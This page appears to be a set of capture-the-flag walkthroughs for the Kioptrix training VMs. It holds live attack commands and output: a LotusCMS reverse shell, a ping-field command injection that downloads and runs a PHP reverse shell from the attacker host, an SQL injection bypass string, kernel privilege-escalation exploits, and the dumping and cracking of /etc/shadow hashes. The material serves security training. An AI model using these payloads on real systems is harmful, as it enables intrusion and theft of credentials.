 $ dirb http://kioptrix3.com | tee dirb.scan
 
 ==> DIRECTORY: http://192.168.1.5/cache/
 + http://192.168.1.5/favicon.ico (CODE:200|SIZE:23126)                                                                                                                                                         + http://192.168.1.5/index.php (CODE:200|SIZE:1819)                                                                                                                                                            + http://192.168.1.5/cache/index.html (CODE:200|SIZE:1819)                                                
 ==> DIRECTORY: http://192.168.1.5/core/controller/                                                      
 + http://192.168.1.5/core/index.php (CODE:200|SIZE:0)                                                                                                                                                          + http://192.168.1.5/gallery/index.php (CODE:500|SIZE:5650)                                                                                                                                                    + http://192.168.1.5/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)                                                                                                                                              + http://192.168.1.5/phpmyadmin/index.php (CODE:200|SIZE:8136)                                             
 + http://192.168.1.5/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)                                                                                                                                                  + http://192.168.1.5/style/admin.php (CODE:200|SIZE:356)                                                                                                                                                       + http://192.168.1.5/style/index.php (CODE:200|SIZE:0)                                                                                                                                                         + http://192.168.1.5/core/controller/index.php (CODE:200|SIZE:0)                                                                                                                                               + http://192.168.1.5/core/lib/index.php (CODE:200|SIZE:0)                                                                                                                                                      + http://192.168.1.5/core/model/index.php (CODE:200|SIZE:0)                                                  
 + http://192.168.1.5/core/view/index.php (CODE:200|SIZE:0)                                                                                                                                                     + http://kioptrix3.com/favicon.ico (CODE:200|SIZE:23126)
 + http://kioptrix3.com/index.php (CODE:200|SIZE:1819)
 + http://kioptrix3.com/cache/index.html (CODE:200|SIZE:1819)
 + http://kioptrix3.com/core/index.php (CODE:200|SIZE:0)
 + http://kioptrix3.com/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
 + http://kioptrix3.com/phpmyadmin/index.php (CODE:200|SIZE:8136)
 + http://kioptrix3.com/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
 + http://kioptrix3.com/style/admin.php (CODE:200|SIZE:356)
 + http://kioptrix3.com/style/index.php (CODE:200|SIZE:0)
 + http://kioptrix3.com/core/controller/index.php (CODE:200|SIZE:0)
 + http://kioptrix3.com/core/lib/index.php (CODE:200|SIZE:0)
 + http://kioptrix3.com/core/model/index.php (CODE:200|SIZE:0)
 + http://kioptrix3.com/core/view/index.php (CODE:200|SIZE:0)
and also scan results from dirsearch :
 $ ./dirsearch.py -u http://kioptrix3.com -e php,asp,aspx,jsp,html,zip,jar,sql --plain-text-report=dirsearchReport
 
 $ cat dirsearchReport | grep 200
 
 200     2KB  http://kioptrix3.com/cache/
 200   688B   http://kioptrix3.com/core/fragments/moduleInfo.phtml
 200    23KB  http://kioptrix3.com/favicon.ico
 200     2KB  http://kioptrix3.com/index.php
 200     2KB  http://kioptrix3.com/index.php/login/
 200   146B   http://kioptrix3.com/modules/TinyMCE/TinyMCEModuleInfo.php
 200     8KB  http://kioptrix3.com/phpmyadmin/
We can access myphpadmin with deafult user `admin` and blank password field, but there is only information_schema is accessible with default credentials.

Exploiting Lotas CMS :

A quick search of lotasCMS vulnerability will shows that version 3.0 is vulnerable to RCE

Link :  https://github.com/Hood3dRob1n/LotusCMS-Exploit

To exploit this start a listener on attack machine
 $ wget https://github.com/Hood3dRob1n/LotusCMS-Exploit/raw/master/lotusRCE.sh
 $ chmod +x lotusRCE.sh
 $ ./lotusRCE.sh kioptrix3.com /
 
 Path found, now to check for vuln....
 
 </html>Hood3dRob1n
 Regex found, site is vulnerable to PHP Code Injection!
 
 About to try and inject reverse shell....
 what IP to use?
 192.168.1.3      <----- IP address of local machine
 What PORT?
 1234             <---- listener port number
 
 OK, open your local listener and choose the method for back connect:
 1) NetCat -exploit    3) NetCat Backpipe5) Exit
 2) NetCat /dev/tcp  4) NetCat FIFO
 #? 1
and we get the reverse connection
 Listening on [0.0.0.0] (family 0, port 1234)
 Connection from kioptrix3.com 37530 received!
 whoami
 www-data
getting tty shell
 python -c 'import pty;pty.spawn("/bin/sh")'
 $

Enumerating files :
Looking at web directory :
 $ pwd
 pwd
 /home/www/kioptrix3.com
 $ ls
 cache  data    gallery  index.php  style
 core   favicon.ico  gnu-lgpl.txt  modules    update.php
 
 $ cd gallery
 
 $ ls
 BACK     gfooter.php     logout.php        readme.html    tags.php
 db.sql     gfunctions.php  p.php       recent.php     themes
 g.php     gheader.php     photos       register.php   version.txt
 gadmin     index.php     photos.php        scopbin      vote.php
 gallery.php  install.BAK     post_comment.php  search.php
 gconfig.php  login.php     profile.php       slideshow.php
 
 $ cat gconfig.php
 <?php
     error_reporting(0);
     /*
         A sample Gallarific configuration file. You should edit
         the installer details below and save this file as gconfig.php
         Do not modify anything else if you don't know what it is.
     */
 
     // Installer Details -----------------------------------------------
 
     // Enter the full HTTP path to your Gallarific folder below,
     // such as http://www.yoursite.com/gallery
     // Do NOT include a trailing forward slash
 
     $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
 
     $GLOBALS["gallarific_mysql_server"] = "localhost";
     $GLOBALS["gallarific_mysql_database"] = "gallery";
     $GLOBALS["gallarific_mysql_username"] = "root";
     $GLOBALS["gallarific_mysql_password"] = "fuckeyou";
In webdirectory of gallery we find database creds "root/fukeyou", and we can successfully logged-in on myphpadmin, and on gallery database we found two usernames with hashed passwords :
 dreg         fb887aabd50f243b3f155c0f85
 loneferret   5badcaf789d3d1d09794d8f021f40f0e
Although these passwords are cracked with crackstation.net
 dreg        :  Mast3r
 loneferret  :  starwars
With user "loneferret/starwars" we can successfully ssh into the machine
 $ ssh loneferret@192.168.1.5
 loneferret@192.168.1.5's password:
 Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
 
 The programs included with the Ubuntu system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.
 
 Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
 applicable law.
 
 To access official Ubuntu documentation, please visit:
 http://help.ubuntu.com/
 Last login: Mon Apr 20 04:26:57 2020 from 192.168.1.3
 loneferret@Kioptrix3:~$ whoami
 loneferret
 loneferret@Kioptrix3:~$
But with this we can't access the root directory
 loneferret@Kioptrix3:~$ cd /root
 -bash: cd: /root: Permission denied

Privilege Escalation :

 Method 1 :
There is a file CompanyPolicy.README, which descirbe command 'sudo ht'
 loneferret@Kioptrix3:~$ cat CompanyPolicy.README
 Hello new employee,
 It is company policy here to use our newly installed software for editing, creating and viewing files.
 Please use the command 'sudo ht'.
 Failure to do so will result in you immediate termination.
 
 DG
 CEO
 loneferret@Kioptrix3:~$ sudo ht
 sudo: no passwd entry for root!
 
 loneferret@Kioptrix3:~$ which ht
 /usr/local/bin/ht
 
 loneferret@Kioptrix3:~$ ls -al /usr/local/bin/ht
 -rwsr-sr-x 1 firefart root 2072344 2011-04-16 07:26 /usr/local/bin/ht
`ht` is a file editor/viewer/analyzer for executables. And in this case it is setted to suid, means it runs with root privilege, and we can edit files which require to root access with it. Means we can escalate our privilege by editing `etc/sudoers` file and allow use `loneferret` to `/bin/su` file, which gives us root access.

Open th file By
 $ sudo ht /etc/sudoers
Which looks like this


To change it into text mode press `F6` and coose text mode


We have to change '!/usr/bin/su' to '/bin/su'


To edit file change the mode into "hex" (press F6) and press F4 to edit, now just place "20" (hex for space) into the place of "!/usr" in "!/usr/bin/su", which looks like

Before :


After :


and press F2 to save.

Now just run the command `sudo su`
 loneferret@Kioptrix3:~$ sudo su
 root@Kioptrix3:/home/loneferret# whoami
 root
Thats it, we get the root shell!!
 Congrats.txt  ht-2.0.18
 root@Kioptrix3:~# cat Congrats.txt
 Good for you for getting here.
 Regardless of the matter (staying within the spirit of the game of course)
 you got here, congratulations are in order. Wasn't that bad now was it.
 
 Went in a different direction with this VM. Exploit based challenges are
 nice. Helps workout that information gathering part, but sometimes we
 need to get our hands dirty in other things as well.
 Again, these VMs are beginner and not intented for everyone.
 Difficulty is relative, keep that in mind.
 
 The object is to learn, do some research and have a little (legal)
 fun in the process.
 
 
 I hope you enjoyed this third challenge.
 
 Steven McElrea
 aka loneferret
 http://www.kioptrix.com
 
 
 Credit needs to be given to the creators of the gallery webapp and CMS used
 for the building of the Kioptrix VM3 site.
 
 Main page CMS:
 http://www.lotuscms.org
 
 Gallery application:
 Gallarific 2.1 - Free Version released October 10, 2009
 http://www.gallarific.com
 Vulnerable version of this application can be downloaded
 from the Exploit-DB website:
 http://www.exploit-db.com/exploits/15891/
 
 The HT Editor can be found here:
 http://hte.sourceforge.net/downloads.html
 And the vulnerable version on Exploit-DB here:
 http://www.exploit-db.com/exploits/17083/
 
 
 Also, all pictures were taken from Google Images, so being part of the
 public domain I used them.
 
 root@Kioptrix3:~#

Method 2 :

We are using this method within the reverse shell obtained by LotusCMS exploit.

First check the version of OS and Kernel
 $ cat /etc/issue
 Ubuntu 8.04.3 LTS \n \l
 
 $ cat /etc/*-release
 DISTRIB_ID=Ubuntu
 DISTRIB_RELEASE=8.04
 DISTRIB_CODENAME=hardy
 DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
 
 $ uname -a
 Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
 
 $ cat /proc/version
 Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009
So the kernel version is 2.6.24, now for searching exploit for Linux kernel 2.6.24 i found following exploit  :  https://www.exploit-db.com/exploits/40839

According to the documentation the exploit creates a new user 'firefart' with root privilege, download it and test it.
 $ cd /tmp
 
 $ wget wget 192.168.1.3:8000/exploit.c
 
 $ gcc -pthread exploit.c -o exploit -lcrypt
 exploit.c:193:2: warning: no newline at end of file
 
 $ ./exploit
 ./exploit
 /etc/passwd successfully backed up to /tmp/passwd.bak
 Please enter the new password: 12345
 
 Complete line:
 firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash
 
 mmap: b7fe0000
 madvise 0
 
 ptrace 0
 Done! Check /etc/passwd to see if the new user was created.
 You can log in with the username 'firefart' and the password '12345'.
 
 
 DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
 Done! Check /etc/passwd to see if the new user was created.
 You can log in with the username 'firefart' and the password '12345'.
 
 
 DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Exploits seems to works, now try to login with new user "firefart" with password 12345
 $ su firefart
 Password: 12345
 
 firefart@Kioptrix3:/tmp# cd /root
 
 firefart@Kioptrix3:~# ls
 Congrats.txt  ht-2.0.18
 
 firefart@Kioptrix3:~# cat Congrats.txt
 Good for you for getting here.
 Regardless of the matter (staying within the spirit of the game of course)
We can access the /root directory.
Read more »

Kioptrix: Level 1.1 (#2) CTF VM WalkThrough

VM : Kioptrix: Level 1.1  

Download Link : https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar

Nmap Scan :
 # Nmap 7.80 scan initiated Thu Apr 16 13:44:53 2020 as: nmap -A -oN nmap.scan 192.168.1.4                                                                                                                  [0/1246]
 Nmap scan report for 192.168.1.4
 Host is up (0.00042s latency).
 Not shown: 994 closed ports
 PORT     STATE SERVICE    VERSION
 22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
 | ssh-hostkey:
 |   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
 |   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
 |_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
 |_sshv1: Server supports SSHv1
 80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
 |_http-server-header: Apache/2.0.52 (CentOS)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 111/tcp  open  rpcbind    2 (RPC #100000)
 443/tcp  open  ssl/https?
 |_ssl-date: 2020-04-16T10:36:08+00:00; -3h09m42s from scanner time.
 | sslv2:
 |   SSLv2 supported
 |   ciphers:
 |     SSL2_RC4_128_EXPORT40_WITH_MD5
 |     SSL2_RC4_128_WITH_MD5
 |     SSL2_DES_64_CBC_WITH_MD5
 |     SSL2_DES_192_EDE3_CBC_WITH_MD5
 |     SSL2_RC2_128_CBC_WITH_MD5
 |     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
 |_    SSL2_RC4_64_WITH_MD5
 631/tcp  open  ipp        CUPS 1.1
 | http-methods:
 |_  Potentially risky methods: PUT
 |_http-server-header: CUPS/1.1
 |_http-title: 403 Forbidden
 3306/tcp open  mysql      MySQL (unauthorized)
 Device type: general purpose
 Running: Linux 2.6.X
 OS CPE: cpe:/o:linux:linux_kernel:2.6
 OS details: Linux 2.6.9 - 2.6.27
 Network Distance: 2 hops
 
 Host script results:
 |_clock-skew: -3h09m42s
 
 TRACEROUTE (using port 256/tcp)
 HOP RTT     ADDRESS
 1   0.05 ms 172.17.0.1
 2   0.32 ms 192.168.1.4
 
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 # Nmap done at Thu Apr 16 13:46:48 2020 -- 1 IP address (1 host up) scanned in 115.94 seconds
Open ports are :
 22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
 80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
 111/tcp  open  rpcbind    2 (RPC #100000)
 443/tcp  open  ssl/https?
 631/tcp  open  ipp        CUPS 1.1
 3306/tcp open  mysql      MySQL (unauthorized)
port 80 is open. There is a web page


There may be an sql injection vulnerability. I tried to find sql injection with sqlmap, but it did not find anything.
 $ sqlmap -u "http://192.168.1.4/index.php" --data="uname=admin&psw=12345&btnLogin=Login"
But after try to find manually with burp repeater, there is a sql injection vulnerability in `psw` field, which can be exploited by putting `' or 1='1 --+` in password field. and it loads another page where we can ping any device within the network.


 192.168.1.10
 PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
 64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=55.5 ms
 64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=3.62 ms
 64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.08 ms
 
 --- 192.168.1.10 ping statistics ---
 3 packets transmitted, 3 received, 0% packet loss, time 2002ms
 rtt min/avg/max/mdev = 1.087/20.070/55.501/25.074 ms, pipe 2
A this functionality, there is possibility for command injection, try to execute command by providing within the ip address
 ip_address;commad
For example
 192.168.1.10;ls
And as expected it returns the filenames on current directory.
 192.168.1.10;ls
 PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
 64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=54.0 ms
 64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=3.52 ms
 64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.17 ms
 
 --- 192.168.1.10 ping statistics ---
 3 packets transmitted, 3 received, 0% packet loss, time 2001ms
 rtt min/avg/max/mdev = 1.175/19.587/54.059/24.394 ms, pipe 2
 index.php
 pingit.php
Another example :
 192.168.1.10;ls -al;pwd;whoami
 PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
 64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=57.1 ms
 64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=1.18 ms
 64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.17 ms
 
 --- 192.168.1.10 ping statistics ---
 3 packets transmitted, 3 received, 0% packet loss, time 2001ms
 rtt min/avg/max/mdev = 1.173/19.832/57.144/26.383 ms, pipe 2
 total 24
 drwxr-xr-x  2 root root 4096 Oct  8  2009 .
 drwxr-xr-x  8 root root 4096 Oct  7  2009 ..
 -rwxr-Sr-t  1 root root 1733 Feb  9  2012 index.php
 -rwxr-Sr-t  1 root root  199 Oct  8  2009 pingit.php
 /var/www/html
 apache
The user is : apache, dirctory is /var/www/html, all the files are root privileged.

Getting a remote shell :

We are going to use php reverse shell from pentestmonkey.net : http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Download it from there page and change the $ip and $port to your local system.
 set_time_limit (0);
 $VERSION = "1.0";
 $ip = '192.168.1.3';  // CHANGE THIS
 $port = 1234;       // CHANGE THIS
 $chunk_size = 1400;
 $write_a = null;
 $error_a = null;
 $shell = 'uname -a; w; id; /bin/sh -i';
 $daemon = 0;
 $debug = 0;
Now to upload this php file we use series of commands. First start a server to host the bd.php(i renamed the reverse shell php file) file. We can use a simple python server
 python -m SimpleHTTPServer 8000
Commands to upload file
 cd /tmp                               # change dirctory to tmp
 wget http://192.168.1.3:8000/bd.php   # downlaod backdoor file
 php -f bd.php                         # execute file
Remember we cant download file on webroot directory, because it is root privileged, and the ping command is executed by user apache. Before execute the commands first start the listener on local machine
 $ nc -lvvp 1234
 Listening on [0.0.0.0] (family 0, port 1234)
Command :
 192.168.1.10;cd /tmp/wget http://192.168.1.3:8000/bd.php;php -f bd.php
After the execution we can get a reverse shell on listener
 $ nc -lvvp 1234
 Listening on [0.0.0.0] (family 0, port 1234)
 Connection from 192.168.1.4 45265 received!
 Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
  12:21:07 up  6:17,  0 users,  load average: 0.00, 0.00, 0.00
 USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=48(apache) gid=48(apache) groups=48(apache)
 sh: no job control in this shell
 sh-3.00$
 sh-3.00$ whoami
 apache
And we can get the reverse shell.

Kernel Privilege Escalation :

Examining the OS and Kernel version
 sh-3.00# uname -a
 Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
 sh-3.00# cat /etc/*-release
 CentOS release 4.5 (Final)
A google search for kernel 2.6 exploit" give the exploit for kernel 2.6.22 less then is found from here : https://www.exploit-db.com/exploits/9542
 $ wget https://www.exploit-db.com/raw/9542
 $ mv 9542 peroot.c
Now downloading it into the Kioptrix
 sh-3.00$ cd /tmp
 sh-3.00$ wget http://192.168.1.3:8000/peroot.c
 sh-3.00$ gcc peroot.c -o peroot
 dirty.c:109:28: warning: no newline at end of file
 sh-3.00$ ./peroot
 sh-3.00# whoami
 root
It gives the root access.

Examining Files :

By examine php files from webroot directory we find the user 'john' and its password 'hiroshima' on mysql_connect() function.
 sh-3.00# cd /var/www/html
 sh-3.00# ls
 index.php
 pingit.php
 sh-3.00# cat index.php
 <?php
     mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
     //print "Connected to MySQL<br />";
     mysql_select_db("webapp");
 
     if ($_POST['uname'] != ""){
         $username = $_POST['uname'];
         $password = $_POST['psw'];
         $query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
         //print $query."<br>";
 ...
 ...
 ...
By using john credentials we can't access the system with ssh, but we can access the mysql database. Now try to execute command in mysql :
 sh-3.00# mysql -u john -phiroshima -e 'show databases;'
 Database
 mysql
 test
 webapp
 sh-3.00# mysql -u john -phiroshima -e 'use webapp;show tables;'
 Tables_in_webapp
 users
 sh-3.00# mysql -u john -phiroshima -e 'use webapp;select * from users;'
 id username password
 1   admin   5afac8d85f
 2   john    66lajGGbla
Now at-least we get the login password for users at index.php login page.

We can also look for .mysql_history file for previous typed commands by users.
 show databases;
 create database webapp;
 use webapp;
 create table users(id INT,username varchar(100),password varchar(10));
 show database;
 select * from users;
 show databases;
 use webapp;
 insert into users values(1,'admin','hello');
 select * from users;
 use mysql
 show databases;
 use mysql;
 select * from users where user=john;
 show tables;
 select * from user where user=john;
 select * from user where user='john';
 select * from user;
 create user 'john'@'localhost' identified by 'hiroshima';
 create user 'webapp'@'localhost' identified by 'hiroshima';
 create user 'webapp'@'localhost' IDENTIFIED BY 'hiroshima';
 CREATE USER 'webapp'@'localhost' identified by 'hiroshima';
 update user set password = password('hiroshima') where user = 'john';
 use mysql;
 show users;
 select * from user;
 create user 'john'@'localhost' identified by 'hiroshima';
 version;
 -v
 ;
 help
 flush privileges;
 show databases;
 use mysql;
 grant select,insert,update,delete on *.* to 'john'@'localhost';
 update user set password = password('hiroshima') where user = 'john';
 flush priveleges;
 use webapp;
 show tables;
 update user set password = password('Ha56!blaKAbl') where user = 'admin';
 update username set password = password('Ha56!blaKAbl') where user = 'admin';
 select * from users;
 update username set password = password('Ha56!blaKAbl') where username = 'admin';
 update users set password = password('Ha56!blaKAbl') where username = 'admin';
 select * from users;
 insert into users values(2,'john','66lajGGbla');
 select * from users;
From /etc/shadow file we got the encrypted passwords for users
 root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::
 john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::
 harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::
Read more »

Kioptrix: Level 1 (#1) CTF VM WalkThrough

VM : MrRobot

Download Link : https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Scanning the whole class A network : 
 $ nmap -sP 192.168.1.0/24
 
 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-07 15:45 UTC
 Nmap scan report for 192.168.1.1
 Host is up (0.059s latency).
 Nmap scan report for 192.168.1.3
 Host is up (0.000035s latency).
 Nmap scan report for 192.168.1.4
 Host is up (0.081s latency).
 Nmap scan report for 192.168.1.104
 Host is up (0.00051s latency).
 Nmap done: 256 IP addresses (4 hosts up) scanned in 18.67 seconds
Our target is 192.168.1.104.

Scanning the target :
 $ nmap -sV -O 192.168.1.104 -oN nmap.scan
 
 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-07 15:58 UTC
 Nmap scan report for 192.168.1.104
 Host is up (0.00053s latency).
 Not shown: 994 closed ports
 PORT     STATE SERVICE     VERSION
 22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
 80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
 111/tcp  open  rpcbind     2 (RPC #100000)
 139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
 443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
 1024/tcp open  status      1 (RPC #100024)
 Device type: general purpose
 Running: Linux 2.4.X
 OS CPE: cpe:/o:linux:linux_kernel:2.4.7
 OS details: Linux 2.4.7
 Network Distance: 2 hops
 
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 21.35 seconds
Operating System :  Linux 2.4.X | cpe:/o:linux:linux_kernel:2.4.7 | Linux 2.4.7 

Scanning URL with dirb : 
 By The Dark Raver
 -----------------
 
 OUTPUT_FILE: dirb.scan
 START_TIME: Tue Apr  7 16:35:19 2020
 URL_BASE: http://192.168.1.104/
 WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
 
 -----------------
 
 GENERATED WORDS: 4612
 
 ---- Scanning URL: http://192.168.1.104/ ----
 + http://192.168.1.104/~operator (CODE:403|SIZE:273)
 + http://192.168.1.104/~root (CODE:403|SIZE:269)
 + http://192.168.1.104/cgi-bin/ (CODE:403|SIZE:272)
 + http://192.168.1.104/index.html (CODE:200|SIZE:2890)
 ==> DIRECTORY: http://192.168.1.104/manual/
 ==> DIRECTORY: http://192.168.1.104/mrtg/
 ==> DIRECTORY: http://192.168.1.104/usage/
 
 ---- Entering directory: http://192.168.1.104/manual/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.
     (Use mode '-w' if you want to scan it anyway)
 
 ---- Entering directory: http://192.168.1.104/mrtg/ ----
 + http://192.168.1.104/mrtg/index.html (CODE:200|SIZE:17318)
 
 ---- Entering directory: http://192.168.1.104/usage/ ----
 + http://192.168.1.104/usage/index.html (CODE:200|SIZE:4810)
 
 -----------------
 END_TIME: Tue Apr  7 16:35:41 2020
 DOWNLOADED: 13836 - FOUND: 6

Scanning path/files with dirsearch :
 
 Extensions: php, asp, aspx, jsp, html, zip, jar, sql | HTTP method: get | Threads: 10 | Wordlist size: 8678
 
 Error Log: /root/tools/dirsearch/logs/errors-20-04-07_17-33-40.log
 
 Target: http://192.168.1.104
 
 [17:33:40] Starting:
 /bin/bash: ]: command not found
 [17:33:41] 403 -  277B  - /.htaccess-dev
 [17:33:41] 403 -  279B  - /.htaccess-local
 [17:33:41] 403 -  268B  - /.hta
 [17:33:41] 403 -  277B  - /.htaccess.BAK
 [17:33:41] 403 -  279B  - /.htaccess-marco
 [17:33:41] 403 -  278B  - /.htaccess.bak1
 [17:33:41] 403 -  278B  - /.htaccess.orig
 [17:33:41] 403 -  277B  - /.htaccess.old
 [17:33:41] 403 -  278B  - /.htaccess.save
 [17:33:41] 403 -  277B  - /.htaccess.txt
 [17:33:41] 403 -  280B  - /.htaccess.sample
 [17:33:41] 403 -  279B  - /.htaccess_extra
 [17:33:41] 403 -  276B  - /.htaccess_sc
 [17:33:41] 403 -  278B  - /.htaccess_orig
 [17:33:41] 403 -  276B  - /.htaccessBAK
 [17:33:41] 403 -  276B  - /.htaccessOLD
 [17:33:41] 403 -  277B  - /.htaccessOLD2
 [17:33:41] 403 -  274B  - /.htaccess~
 [17:33:41] 403 -  272B  - /.htgroup
 [17:33:41] 403 -  277B  - /.htpasswd-old
 [17:33:41] 403 -  278B  - /.htpasswd_test
 [17:33:41] 403 -  274B  - /.htpasswds
 [17:33:41] 403 -  272B  - /.htusers
 [17:33:48] 403 -  272B  - /cgi-bin/
 [17:33:49] 403 -  268B  - /doc/
 [17:33:49] 403 -  282B  - /doc/stable.version
 [17:33:49] 403 -  283B  - /doc/en/changes.html
 [17:33:51] 200 -    3KB - /index.html
 [17:33:52] 301 -  294B  - /manual  ->  http://127.0.0.1/manual/
 [17:33:56] 200 -   27B  - /test.php
 [17:33:57] 200 -    5KB - /usage/
 
 Task Completed
Findings :
[17:33:51] 200 -    3KB - /index.html
[17:33:56] 200 -   27B  - /test.php
[17:33:57] 200 -    5KB - /usage/
Now at the `http://192.168.1.104/usage/` there is Webalizer Version 2.01 created page, and search for the gives "Webalizer 2.1.x Buffer Overflow vulnerabilty" which Allows Remote Users to Execute Arbitrary Code on the Server via Reverse DNS Lookups. But i didn't find any exploit for that. However there is an XSS vulnerability. To exploit this just send a curl request and attach payload on the referrer header which can be added to the http://192.168.1.104/usage/usage_DATE.html page. But this is not much useful.

Now try to exploit findings from nmap, which are :
 22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
 80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
 111/tcp  open  rpcbind     2 (RPC #100000)
 139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
 443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
 1024/tcp open  status      1 (RPC #100024)
Searching for `Apache 1.3.20` :  

The above search lead to `Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow` and we can see that in our target server the ssl server version is 2.8.4 so we can try to exploit this buffer overflow. The exploit can be found at here :  https://www.exploit-db.com/exploits/47080 (newer version). so first we download the exploit and follow the instruction given on that page :
 $ ./OpenFuck | grep 1.3.20 | grep RedHat
     0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
     0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
 
 $ ./OpenFuck 0x6b 192.168.1.104 443 -c 40
 
 *******************************************************************
 * OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
 *******************************************************************
 * by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
 * #hackarena  irc.brasnet.org                                     *
 * TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
 * #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
 * #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
 *******************************************************************
 
 Connection... 40 of 40
 Establishing SSL connection
 cipher: 0x4043808c   ciphers: 0x80f8088
 Ready to send shellcode
 Spawning shell...
 bash: no job control in this shell
 bash-2.05$
 d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
 --15:11:51--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
            => `ptrace-kmod.c'
 Connecting to dl.packetstormsecurity.net:443... connected!
 HTTP request sent, awaiting response... 200 OK
 Length: 3,921 [text/x-csrc]
 
     0K ...                                                   100% @   3.74 MB/s
 
 15:11:53 (1.87 MB/s) - `ptrace-kmod.c' saved [3921/3921]
 
 /usr/bin/ld: cannot open output file exploit: Permission denied
 collect2: ld returned 1 exit status
 gcc: file path prefix `/usr/bin' never used
 ls
 exploit
 whoami
 root
Try 2 to 3 times if exploit does not work (because the payload download a file "ptrace-kmod.c" from internet). We can get a root shell. Now from here we can get /etc/shadow and /etc/passwd file. Copy them on the system and try to crack the passwords of users with john.
 $ unshadow passwdfile shadowfile > crack.passwd.db
 $ john crack.passwd.db

samba service : 

 There is also samba service is running, (revealed by nmap scan). Now enumerating samba service :

with nbtscan :
 nbtscan 192.168.1.104
 Doing NBT name scan for addresses from 192.168.1.104
 
 IP address       NetBIOS Name     Server    User             MAC address
 ------------------------------------------------------------------------------
 192.168.1.104    KIOPTRIX         <server>  KIOPTRIX         00:00:00:00:00:00

with enum4linux :
 ./enum4linux.pl 192.168.1.104
 WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Apr  7 20:29:41 2020
 
  ==========================
